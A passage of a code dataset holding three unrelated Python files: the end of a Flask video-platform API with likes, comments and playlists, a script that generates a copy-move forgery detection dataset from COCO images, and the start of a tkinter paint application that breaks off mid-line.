video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = dislikes_handler.count('id_video', video_details['id'])\n video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n return make_response(video_details), 200\n \n return make_response({'error':'Video nao encontrado.'}), 404\n\n@app.route('/api/videos/view/', methods=['POST'])\ndef increment_view(id_video):\n video_handler = Crud('video')\n \n video_details = video_handler.get_element_by_pk(id_video,'id')\n if video_details:\n video_handler.update_element(id_video,['views'], [video_details['views'] + 1], 'id')\n new_video_details = video_handler.get_element_by_pk(id_video,'id')\n \n if new_video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', new_video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = dislikes_handler.count('id_video', new_video_details['id'])\n new_video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n \n return make_response(new_video_details), 200\n \n return make_response({'error':'Este video não existe.'})\n\n\n@app.route('/api/videos/like', methods=['POST'])\ndef add_like():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n likes_handler = Crud('likes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = likes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu like neste vídeo.'}), 400\n else:\n likes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu like no vídeo de ID {id_video}.'\n }) \n\n\n@app.route('/api/videos/dislike', methods=['POST'])\ndef add_dislike():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n dislikes_handler = Crud('dislikes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = dislikes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu dislike neste vídeo.'}), 400\n else:\n dislikes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu dislike no vídeo de ID {id_video}.'\n }) \n\n@app.route('/api/videos//comments', methods=['GET'])\ndef get_comments(id_video):\n \n comments_handler = Crud('comments_video')\n comments_video = comments_handler.get_elements_by_string_field('id_video', id_video)\n user_handler = Crud('user')\n\n if id_video not in [row['id_video'] for row in comments_video]:\n return make_response({'message': f'O vídeo de ID {id_video} não possui comentários.'}), 404\n\n for row in comments_video:\n user = user_handler.get_element_by_pk(row['id_user'], 'id')\n row.update({'name':user['name']})\n\n return make_response(comments_video)\n\n@app.route('/api/videos//comments', methods=['POST'])\ndef add_comment(id_video):\n \n id_user = request.json.get('id_user')\n comment_desc = request.json.get('comment')\n\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n \n comment_handler = Crud('comments_video')\n comment_handler.insert(['id_user', 'id_video', 'descr'], [id_user, id_video, comment_desc])\n \n return make_response({'message': 'Comentário adicionado com sucesso.'})\n\n@app.route('/api/videos/comments/', methods=['DELETE'])\ndef delete_comment(comment_id):\n comments_handler = Crud('comments_video')\n comment = comments_handler.get_element_by_pk(comment_id, 'id')\n \n if comment:\n comments_handler.delete_element(comment_id, 'id')\n return make_response({'message': f'Comentário de ID {comment_id} foi excluído com sucesso.'}), 200\n \n return make_response({'message': f'O comentário de ID {comment_id} não foi encontrado.'}), 404\n \n@app.route('/api/playlists', methods=['POST'])\ndef create_playlist():\n \n playlist_name = request.json.get('name')\n id_user = request.json.get('id_user')\n \n if playlist_name and id_user:\n user_list_handler = Crud('user_list')\n user_list_handler.insert(['id_user', 'name'],[id_user, playlist_name])\n else:\n return make_response({'message': 'O id do utilizador e o nome da playlist são obrigatórios.'}), 403\n\n\n return make_response({'message': 'Playlist criada com sucesso.'}), 201\n\n@app.route('/api/playlists', methods=['DELETE'])\ndef delete_playlist():\n req = request.json\n list_id = req.get('id')\n if list_id:\n list_handler = Crud('user_list')\n video_handler = Crud('video_list')\n video_handler.delete_element(list_id, 'id_user_list')\n list_handler.delete_element(list_id, 'id')\n return make_response({'message':'Playlist removida com sucesso.'})\n else:\n return make_response({'error':'Id da playlist em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['POST'])\ndef add_video_to_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n \n video_handler = Crud('video')\n video_in_db = video_handler.get_element_by_pk(id_video, 'id')\n\n user_list_handler = Crud('user_list')\n user_list_in_db = user_list_handler.get_element_by_pk(id_user_list, 'id')\n\n if not video_in_db:\n return make_response({'error': 'Este video não existe.'})\n \n if not user_list_in_db:\n return make_response({'error': 'Esta playlist não existe.'})\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n handler.insert(cols, values)\n return make_response({'message':'Video inserido à playlist com sucesso.'}), 200\n else:\n return make_response({'message':'Este video já existe na playlist.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['DELETE'])\ndef del_video_from_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n return make_response({'error':'Este video não existe na playlist.'}), 200\n else:\n handler.delete_element(in_db[0]['id'], 'id')\n return make_response({'message':'O video foi removido com sucesso.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/', methods=['GET'])\ndef get_playlist(id_user):\n\n playlist_handler = Crud('user_list')\n playlists = playlist_handler.get_elements_by_string_field('id_user', id_user)\n \n if playlists:\n return make_response(playlists)\n \n return make_response({'message': 'Este utilizador não tem playlists.'})\n\n\n@app.route('/api/playlists/videos/', methods=['GET'])\ndef get_videos_from_playlist(id_playlist):\n\n playlist_handler = Crud('video_list')\n videos = playlist_handler.get_elements_by_string_field('id_user_list', id_playlist)\n \n if videos:\n return make_response(videos)\n \n return make_response({'message': 'Esta playlist não existe ou está vazia.'})\n \n@app.route('/api/videos/top/', methods=['GET'])\ndef get_top_vieos(n_top):\n handler = Crud('video')\n result = handler.get_top(n_top, 'views')\n \n if result:\n return make_response(result)\n \n return make_response({'error':'Ups alguma coisa correu mal.'})\n\n@app.route('/api/videos/youtube/', methods=['GET'])\ndef get_video_id_from_id_platform(id_platform):\n handler = Crud('video')\n\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n\n if y_video:\n return make_response(y_video[0]), 200\n \n handler.insert(['id_platform', 'platform', 'views'], [id_platform, 'youtube', 0])\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n \n if y_video:\n return make_response(y_video[0]), 200\n \n return make_response({'error':'Ups algo correu mal.'}), 400\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=os.getenv(\"PORT\", default=5000))\n", "repo_name": "ThunderShake/sd_api", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 9, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 23, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 62, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 71, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 73, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 74, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 78, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 93, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 97, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 101, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 108, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 112, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 120, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 137, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 138, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 169, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 170, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 177, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 188, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 197, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 202, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 214, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 214, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 216, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 223, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 226, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 231, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 251, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 254, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 261, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 261, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 264, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 275, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 279, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 289, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 305, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 308, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 325, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 328, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 331, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 334, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 345, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 351, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 355, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 357, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 361, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 365, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 367, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 371, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 376, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 382, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 384, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 388, "usage_type": "call"}]} +{"seq_id": "40566481823", "text": "#数据及的制作\n\"\"\"\n1: 遍历 annotations keys\n2: 获取图片id\n3: 根据图片id获取改张图片信息\n4: 获取annotations的area数据\n5: 根据面积占比对mask进行筛选,跳过面积占比大于10的mask\n6: 获取segmentation信息\n7: 打开原始图片并裁剪得到mask部分\n 裁剪目标方式,性生成一个只有目标的图片m1\n 对图片以及mask图片进行旋转,缩放,确定上下左右移动位置\n 上下左右移动位置方案:\n\n8: 将原始图片和trans——image图片重叠,得到copy move图片\n9: 生成copy move标签\n10: 将训练图片和标签进行同名分文件及保存\n\"\"\"\nimport json\nimport os\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nfrom crop_test import get_cm_image_mask, get_new_iamge\nfrom utiles import get_annotations, get_id2info_dic\n\n\ndef main():\n source_image_path = '/home/hewaele/Desktop/coco数据集/val2014'\n annotations_path = '/home/hewaele/Desktop/coco数据集/annotations_trainval2014/annotations/instances_val2014.json'\n images_path = '../cmfd_data/images_v2'\n mask_path = '../cmfd_data/mask_v2'\n id2info_path = '../source_data/id2info_dic.json'\n\n count = 0\n id2info_data = get_id2info_dic(id2info_path)\n annotations = get_annotations(annotations_path)\n for pos, annotation in enumerate(annotations[:]):\n image_id = annotation['image_id']\n image_info = id2info_data[str(image_id)]\n annotation_area = annotation['area']\n # print(image_info['file_name'])\n h, w = image_info['height'], image_info['width']\n if 0.0005 <= annotation_area/(h*w) <= 0.1:\n try:\n #获取mask标注信息\n #[x1 y1, x2, y2, x3, y3 ......]\n segmentation = annotation['segmentation'][0]\n image = Image.open(os.path.join(source_image_path, image_info['file_name']))\n image = np.array(image)\n #获得copy move\n trans_image, trans_mask = get_cm_image_mask(image, np.array(segmentation, np.int32).reshape([-1, 2]))\n\n #将原始图片和trans image合并\n new_image = get_new_iamge(image, trans_image, trans_mask)\n # plt.subplot(221)\n # plt.imshow(image)\n # plt.subplot(222)\n # plt.imshow(trans_image)\n # plt.subplot(223)\n # plt.imshow(trans_mask)\n # plt.subplot(224)\n # plt.imshow(new_image)\n # # plt.scatter(segmentation[::2], segmentation[1::2])\n # plt.show()\n # break\n #\n # #将生成的结果图片保存\n save_image = Image.fromarray(new_image)\n save_mask = Image.fromarray(trans_mask)\n save_image.save(os.path.join(images_path, 'image_'+str(count)+'.png'))\n save_mask.save(os.path.join(mask_path, 'mask_'+str(count)+'.png'))\n print(count)\n count += 1\n\n except:\n print('error')\n\n if count >= 150000:\n break\n\n print(count)\n print('done')\nif __name__ == '__main__':\n main()\n\n", "repo_name": "hewaele/creat_copy_move", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utiles.get_id2info_dic", "line_number": 36, "usage_type": "call"}, {"api_name": "utiles.get_annotations", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "crop_test.get_cm_image_mask", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "crop_test.get_new_iamge", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "42548347334", "text": "from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter.colorchooser import askcolor\r\nfrom PIL import ImageTk, Image,ImageColor\r\nimport numpy as np\r\nimport matplotlib as mp\r\nimport cv2\r\nclass Paint(object):\r\n\r\n DEFAULT_PEN_SIZE = 5.0\r\n DEFAULT_COLOR = 'black'\r\n\r\n def __init__(self):\r\n self.root = Tk()\r\n self.root.title('Paint')\r\n self.root.geometry('1200x800')\r\n self.root.maxsize(1920,1080)\r\n self.root.minsize(500,300)\r\n self.original_image=0\r\n self.edited_image=0\r\n self.filtered_image=0\r\n self.img = PhotoImage('pen.png') \r\n \r\n self.paint_tools = Frame(self.root,width=250,height=600,relief=RIDGE,borderwidth=2)\r\n self.paint_tools.place(x=0,y=0)\r\n\r\n self.upload_logo = ImageTk.PhotoImage(Image.open('pen.png'))\r\n self.p = Label(self.paint_tools, text=\"Upload\",borderwidth=0,font=('verdana',10,'bold'))\r\n self.p.place(x=50,y=15)\r\n self.pen_button = Button(self.paint_tools,padx=6,image=self.upload_logo,borderwidth=2,command=self.upload_action)\r\n self.pen_button.place(x=5,y=10)\r\n\r\n self.brush_logo = ImageTk.PhotoImage(Image.open('brush.png'))\r\n self.b = Label(self.paint_tools,borderwidth=0,text='brush',font=('verdana',10,'bold'))\r\n self.b.place(x=50,y=45)\r\n self.brush_button = Button(self.paint_tools,image = self.brush_logo,borderwidth=2,command=self.draw_action) \r\n self.brush_button.place(x=5,y=40)\r\n\r\n self.color_logo = ImageTk.PhotoImage(Image.open('color.png'))\r\n self.cl = Label(self.paint_tools, text='color',font=('verdana',10,'bold'))\r\n self.cl.place(x=50,y=75)\r\n self.color_button = Button(self.paint_tools,image = self.color_logo,borderwidth=2,command=self.choose_color)\r\n self.color_button.place(x=5,y=70)\r\n\r\n self.eraser_logo = ImageTk.PhotoImage(Image.open('eraser.png'))\r\n self.e = Label(self.paint_tools, text='eraser',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=105)\r\n self.eraser_button = Button(self.paint_tools,image = self.eraser_logo,borderwidth=2,command=self.erasef)\r\n self.eraser_button.place(x=5,y=100)\r\n \r\n self.rrotate_logo = ImageTk.PhotoImage(Image.open('right.png').resize((30,30)))\r\n self.e = Label(self.paint_tools, text='right rotate',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=135)\r\n self.eraser_button = Button(self.paint_tools,image = self.rrotate_logo,borderwidth=2,command=self.rotate_right_action)\r\n self.eraser_button.place(x=5,y=130)\r\n \r\n self.rotateleft_logo = ImageTk.PhotoImage(Image.open('left.png').resize((30,30)))\r\n self.rl = Label(self.paint_tools, text='left rotate',font=('verdana',10,'bold'))\r\n self.rl.place(x=50,y=165)\r\n self.rl_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.rotate_left_action)\r\n self.rl_button.place(x=5,y=160)\r\n \r\n self.translate_logo = ImageTk.PhotoImage(Image.open('translate.png').resize((30,30)))\r\n self.translateimg = Label(self.paint_tools, text='Translate',font=('verdana',10,'bold'))\r\n self.translateimg.place(x=50,y=195)\r\n self.translateimg_button = Button(self.paint_tools,image = self.translate_logo,borderwidth=2,command=self.translate)\r\n self.translateimg_button.place(x=5,y=190)\r\n\r\n\r\n self.bigger_logo = ImageTk.PhotoImage(Image.open('bigger.png').resize((30,30)))\r\n self.biggerimg = Label(self.paint_tools, text='Bigger',font=('verdana',10,'bold'))\r\n self.biggerimg.place(x=50,y=225)\r\n self.biggerimg_button = Button(self.paint_tools,image = self.bigger_logo,borderwidth=2,command=self.scale_bigger)\r\n self.biggerimg_button.place(x=5,y=220)\r\n \r\n self.smaller_logo = ImageTk.PhotoImage(Image.open('smaller.png').resize((30,30)))\r\n self.smallerimg = Label(self.paint_tools, text='Smaller',font=('verdana',10,'bold'))\r\n self.smallerimg.place(x=50,y=255)\r\n self.smallerimg_button = Button(self.paint_tools,image = self.smaller_logo,borderwidth=2,command=self.scale_smaller)\r\n self.smallerimg_button.place(x=5,y=250)\r\n\r\n self.skew_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.skewimg = Label(self.paint_tools, text='Skew',font=('verdana',10,'bold'))\r\n self.skewimg.place(x=50,y=285)\r\n self.skewimg_button = Button(self.paint_tools,image = self.skew_logo,borderwidth=2,command=self.skew)\r\n self.skewimg_button.place(x=5,y=280)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapx',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=315)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapx)\r\n self.saveimg_button.place(x=5,y=310)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapy',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=345)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapy)\r\n self.saveimg_button.place(x=5,y=340)\r\n \r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='save',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=375)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.save_action)\r\n self.saveimg_button.place(x=5,y=370)\r\n \r\n \r\n self.pen_size = Label(self.paint_tools,text=\"Brush Size\",font=('verdana',10,'bold'))\r\n self.pen_size.place(x=15,y=520)\r\n self.choose_size_button = Scale(self.paint_tools, from_=1, to=20, orient=VERTICAL)\r\n self.choose_size_button.place(x=20,y=420)\r\n \r\n\r\n self.c = Canvas(self.root ,height=1000,width=1000)\r\n self.c.place(x=250,y=0)\r\n\r\n self.setup()\r\n self.root.mainloop()\r\n\r\n def setup(self):\r\n self.old_x = None\r\n self.old_y = None\r\n self.c.create_image(100,100,anchor=NW,image=self.img)\r\n self.c.image = self.img \r\n self.line_width = self.choose_size_button.get()\r\n self.color_code = self.DEFAULT_COLOR\r\n self.erase = False\r\n self.active_button = self.brush_button\r\n \r\n # self.c.bind('', self.paint)\r\n # self.c.bind('', self.reset)\r\n\r\n # def use_pen(self):\r\n # self.activate_button(self.pen_button)\r\n\r\n # def use_brush(self):\r\n # self.activate_button(self.brush_button)\r\n\r\n # def choose_color(self):\r\n # self.eraser_on = False\r\n # self.color = askcolor(color=self.color)[1]\r\n\r\n # de f use_eraser(self):\r\n # self.activate_button(self.eraser_button, eraser_mode=True)\r\n\r\n # def activate_button(self, some_button, eraser_mode=False):\r\n # self.active_button.config(relief=RAISED)\r\n # some_button.config(relief=SUNKEN)\r\n # self.active_button = some_button\r\n # self.eraser_on = eraser_mode\r\n\r\n # def paint(self, event):\r\n # self.line_width = self.choose_size_button.get()\r\n # paint_color = 'white' if self.eraser_on else self.color\r\n # if self.old_x and self.old_y:\r\n # self.c.create_line(self.old_x, self.old_y, event.x, event.y,\r\n # width=self.line_width, fill=paint_color,\r\n # capstyle=ROUND, smooth=TRUE, splinesteps=36)\r\n # self.old_x = event.x\r\n # self.old_y = event.y\r\n def erasef(self):\r\n self.erase=True\r\n \r\n def draw_action(self):\r\n self.c.bind(\"\", self.start_draw)\r\n self.c.bind(\"\", self.draw)\r\n\r\n def choose_color(self):\r\n self.color_code = askcolor(color=self.color_code)[1]\r\n\r\n def start_draw(self, event):\r\n self.x = event.x\r\n self.y = event.y\r\n self.draw_ids = []\r\n \r\n \r\n def draw(self, event):\r\n # print(self.draw_ids)\r\n if self.erase:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill='#ffffff', capstyle=ROUND, smooth=True))\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (255,255,255) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n else:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill=self.color_code, capstyle=ROUND, smooth=True))\r\n RGB = ImageColor.getcolor(self.color_code,'RGB')\r\n R= RGB[0]\r\n G= RGB[1]\r\n B= RGB[2]\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * 